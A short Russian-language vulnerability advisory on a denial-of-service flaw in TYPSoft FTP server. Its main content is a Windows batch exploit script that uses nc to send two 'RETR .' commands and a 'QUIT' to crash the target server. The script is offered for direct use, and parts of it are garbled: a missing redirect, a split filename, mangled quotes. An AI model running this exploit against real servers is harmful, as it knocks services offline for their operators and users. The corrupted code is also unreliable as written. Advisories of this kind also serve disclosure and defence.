Уязвимость обнаружена в TYPSoft FTP server. Удаленный авторизованный пользователь может вызвать условия отказа в обслуживании на целевом сервере.
Удаленный авторизованный пользователем (включая анонимного пользователя) может выполнить две последовательных команды «RETR .», за которыми следует команда «QUIT», чтобы вызвать условия отказа в обслуживании на целевом FTP сервере. 

Эксплоит: 

@echo off
if ‘%3’==» echo Usage:%0 target ^<UserName^> ^<PassWord^> [port]&goto 
:eof
set FTPUSER=%2
set FTPPWD=%3
set PORT=21
if not ‘%4’==» set PORT=%4
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe 
echo Need nc.exe&goto :eof

echo USER %FTPUSER%ftp.cmd
echo PASS %FTPPWD%>ftp.cmd
echo RETR .>>ftp.cmd
echo RETR .>>ftp.cmd
echo QUIT>>ftp.cmd
nc -v %1 %PORT%<ftp.cmd
del ftp.cm
d



Оставить мнение